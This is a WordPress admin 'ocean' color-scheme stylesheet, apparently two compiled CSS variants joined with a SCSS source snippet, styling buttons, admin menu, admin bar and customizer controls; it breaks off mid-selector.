box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } input[type=checkbox]:focus, input[type=radio]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #ffffff, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected=true] { background-color: var(--wp-admin-theme-color); } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } /* Core UI */ .wp-core-ui { /* Default button - theme color border and text (matches secondary) */ } .wp-core-ui .button { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button:disabled, .wp-core-ui .button.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Secondary button - same as default */ } .wp-core-ui .button-secondary { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button-secondary:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-secondary:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-secondary:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button-secondary:disabled, .wp-core-ui .button-secondary.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Primary button - theme color background */ } .wp-core-ui .button-primary { background: var(--wp-admin-theme-color); border-color: transparent; border-radius: 2px; color: #fff; } .wp-core-ui .button-primary:hover { background: var(--wp-admin-theme-color-darker-10); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:focus { background: var(--wp-admin-theme-color); border-color: transparent; color: #fff; /* Gutenberg-style focus ring: outer theme color + inset white for contrast */ box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color), inset 0 0 0 1px #ffffff; /* Visible in Windows High Contrast mode */ outline: 1px solid transparent; } .wp-core-ui .button-primary:active { background: var(--wp-admin-theme-color-darker-20); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:disabled, .wp-core-ui .button-primary.disabled { background: #f0f0f0; border-color: transparent; color: #949494; cursor: not-allowed; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary.active:hover { background: var(--wp-admin-theme-color-darker-10); color: #fff; border-color: transparent; box-shadow: none; } .wp-core-ui .button-group > .button.active { border-color: var(--wp-admin-theme-color); background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .wp-core-ui .wp-ui-primary { color: #fff; background-color: #738e96; } .wp-core-ui .wp-ui-text-primary { color: #738e96; } .wp-core-ui .wp-ui-highlight { color: #fff; background-color: #9ebaa0; } .wp-core-ui .wp-ui-text-highlight { color: #9ebaa0; } .wp-core-ui .wp-ui-notification { color: #fff; background-color: #aa9d88; } .wp-core-ui .wp-ui-text-notification { color: #aa9d88; } .wp-core-ui .wp-ui-text-icon { color: #f2fcff; } /* List tables */ .wrap .page-title-action { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wrap .page-title-action:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wrap .page-title-action:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wrap .page-title-action:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .view-switch a.current:before { color: #738e96; } .view-switch a:hover:before { color: #aa9d88; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: #738e96; } #adminmenu a { color: #fff; } #adminmenu div.wp-menu-image:before { color: #f2fcff; } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: #fff; background-color: #9ebaa0; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: #fff; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: #f0f0f0; border-bottom-color: #f0f0f0; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-left-color: rgb(98.2714285714, 123.5412244898, 131.0285714286); } #adminmenu .wp-submenu .wp-submenu-head { color: rgb(213, 221.1, 223.5); } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a { color: rgb(213, 221.1, 223.5); } #adminmenu .wp-submenu a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-has-current-submenu .wp-submenu a:focus, #adminmenu .wp-has-current-submenu .wp-submenu a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover { color: #9ebaa0; } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: #fff; } #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus { color: #9ebaa0; } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-left-color: #f0f0f0; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: #fff; background: #9ebaa0; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #fff; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: #fff; background: #aa9d88; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: #fff; background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } /* Admin Menu: collapse button */ #collapse-button { color: #f2fcff; } #collapse-button:hover, #collapse-button:focus { color: #9ebaa0; } /* Admin Bar */ #wpadminbar { color: #fff; background: #738e96; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #fff; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: #f2fcff; } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: #9ebaa0; background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: #9ebaa0; } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: #9ebaa0; } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: rgb(142.7255, 154.4890142857, 157.9745); } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: rgb(213, 221.1, 223.5); } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: #f2fcff; } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: #9ebaa0; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: #9ebaa0; } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: #f2fcff; } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: #f2fcff; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: #fff; background: rgb(135.4, 158.4657142857, 165.3); } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #aa9d88; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: #fff; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover > .ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: rgb(153, 141.3, 122.4); } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: rgb(135.4, 158.4657142857, 165.3); background-color: rgb(135.4, 158.4657142857, 165.3); } #wpadminbar #wp-admin-bar-user-info .display-name { color: #fff; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: #9ebaa0; } #wpadminbar #wp-admin-bar-user-info .username { color: rgb(213, 221.1, 223.5); } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: #9ebaa0; border-color: rgb(143.0993975904, 175.4006024096, 145.406626506); } .wp-pointer .wp-pointer-content h3:before { color: #9ebaa0; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: #9ebaa0; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: #9ebaa0; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #9ebaa0; } .attachment.details .check { background-color: #9ebaa0; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #9ebaa0; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #9ebaa0; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: #9ebaa0; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: #9ebaa0; } .theme-section.current, .theme-filter.current { border-bottom-color: #738e96; } body.more-filters-opened .more-filters { color: #fff; background-color: #738e96; } body.more-filters-opened .more-filters:before { color: #fff; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: #9ebaa0; color: #fff; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: #fff; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: #9ebaa0; color: #fff; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: #fff; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px rgb(187.8012048193, 207.1987951807, 189.186746988), 0 0 2px 1px #9ebaa0; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: #f2fcff; } .wp-responsive-open div#wp-responsive-toggle a { border-color: transparent; background: #9ebaa0; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: #f2fcff; } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: #9ebaa0; } /* Customizer */ .wp-core-ui #customize-controls .control-section:hover > .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:hover, .wp-core-ui #customize-controls .control-section.open .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:focus { color: #0073aa; border-right-color: #9ebaa0; } .wp-core-ui .customize-controls-close:focus, .wp-core-ui .customize-controls-close:hover, .wp-core-ui .customize-controls-preview-toggle:focus, .wp-core-ui .customize-controls-preview-toggle:hover { color: #0073aa; border-top-color: #9ebaa0; } .wp-core-ui .customize-panel-back:hover, .wp-core-ui .customize-panel-back:focus, .wp-core-ui .customize-section-back:hover, .wp-core-ui .customize-section-back:focus { color: #0073aa; border-right-color: #9ebaa0; } .wp-core-ui .customize-screen-options-toggle:hover, .wp-core-ui .customize-screen-options-toggle:active, .wp-core-ui .customize-screen-options-toggle:focus, .wp-core-ui .active-menu-screen-options .customize-screen-options-toggle, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: #0073aa; } .wp-core-ui .customize-screen-options-toggle:focus:before, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-core-ui.wp-customizer button:focus .toggle-indicator:before, .wp-core-ui .menu-item-bar .item-delete:focus:before, .wp-core-ui #available-menu-items .item-add:focus:before, .wp-core-ui #customize-save-button-wrapper .save:focus, .wp-core-ui #publish-settings:focus { box-shadow: 0 0 0 1px rgb(187.8012048193, 207.1987951807, 189.186746988), 0 0 2px 1px #9ebaa0; } .wp-core-ui #customize-controls .customize-info.open .customize-help-toggle, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover { color: #0073aa; } .wp-core-ui .control-panel-themes .customize-themes-section-title:focus, .wp-core-ui .control-panel-themes .customize-themes-section-title:hover { border-right-color: #9ebaa0; color: #0073aa; } .wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: #9ebaa0; } .wp-core-ui .control-panel-themes .customize-themes-section-title.selected { color: #0073aa; } .wp-core-ui #customize-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after, .wp-core-ui #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: #0073aa; } .wp-core-ui .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: #9ebaa0; border-style: solid; box-shadow: 0 0 0 1px #9ebaa0; outline: 2px solid transparent; } .wp-core-ui .wp-full-overlay-footer .devices button:focus, .wp-core-ui .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #9ebaa0; } .wp-core-ui .wp-full-overlay-footer .devices button:hover:before, .wp-core-ui .wp-full-overlay-footer .devices button:focus:before { color: #9ebaa0; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #9ebaa0; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px rgb(187.8012048193, 207.1987951807, 189.186746988), 0 0 2px 1px #9ebaa0; } .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: #9ebaa0; color: #0073aa; }$base-color: #738e96; @use "../_admin.scss" with ( $scheme-name: "ocean", $base-color: $base-color, $icon-color: #f2fcff, $highlight-color: #9ebaa0, $notification-color: #aa9d88, $form-checked: $base-color, $low-contrast-theme: "true" ); /*! This file is auto-generated */ /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ /* * Tertiary button mixin - transparent background, gray text. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f0f0f0; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button.button-link:hover, .wp-core-ui .button.button-link:active { color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-link:focus, .wp-core-ui .button.button-link:focus { color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-link:disabled, .wp-core-ui .button-link[aria-disabled=true], .wp-core-ui .button.button-link:disabled, .wp-core-ui .button.button-link[aria-disabled=true] { color: #949494; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #cc1818; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: rgb(230.6842105263, 48.3157894737, 48.3157894737); } /* Forms */ input[type=checkbox]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type=radio]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } input[type=checkbox]:focus, input[type=radio]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #ffffff, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected=true] { background-color: var(--wp-admin-theme-color); } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } /* Core UI */ .wp-core-ui { /* Default button - theme color border and text (matches secondary) */ } .wp-core-ui .button { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button:disabled, .wp-core-ui .button.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Secondary button - same as default */ } .wp-core-ui .button-secondary { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button-secondary:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-secondary:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-secondary:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button-secondary:disabled, .wp-core-ui .button-secondary.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Primary button - theme color background */ } .wp-core-ui .button-primary { background: var(--wp-admin-theme-color); border-color: transparent; border-radius: 2px; color: #fff; } .wp-core-ui .button-primary:hover { background: var(--wp-admin-theme-color-darker-10); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:focus { background: var(--wp-admin-theme-color); border-color: transparent; color: #fff; /* Gutenberg-style focus ring: outer theme color + inset white for contrast */ box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color), inset 0 0 0 1px #ffffff; /* Visible in Windows High Contrast mode */ outline: 1px solid transparent; } .wp-core-ui .button-primary:active { background: var(--wp-admin-theme-color-darker-20); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:disabled, .wp-core-ui .button-primary.disabled { background: #f0f0f0; border-color: transparent; color: #949494; cursor: not-allowed; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary.active:hover { background: var(--wp-admin-theme-color-darker-10); color: #fff; border-color: transparent; box-shadow: none; } .wp-core-ui .button-group > .button.active { border-color: var(--wp-admin-theme-color); background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .wp-core-ui .wp-ui-primary { color: #fff; background-color: #738e96; } .wp-core-ui .wp-ui-text-primary { color: #738e96; } .wp-core-ui .wp-ui-highlight { color: #fff; background-color: #9ebaa0; } .wp-core-ui .wp-ui-text-highlight { color: #9ebaa0; } .wp-core-ui .wp-ui-notification { color: #fff; background-color: #aa9d88; } .wp-core-ui .wp-ui-text-notification { color: #aa9d88; } .wp-core-ui .wp-ui-text-icon { color: #f2fcff; } /* List tables */ .wrap .page-title-action { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wrap .page-title-action:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wrap .page-title-action:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wrap .page-title-action:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .view-switch a.current:before { color: #738e96; } .view-switch a:hover:before { color: #aa9d88; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: #738e96; } #adminmenu a { color: #fff; } #adminmenu div.wp-menu-image:before { color: #f2fcff; } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: #fff; background-color: #9ebaa0; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: #fff; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: #f0f0f0; border-bottom-color: #f0f0f0; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-right-color: rgb(98.2714285714, 123.5412244898, 131.0285714286); } #adminmenu .wp-submenu .wp-submenu-head { color: rgb(213, 221.1, 223.5); } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu 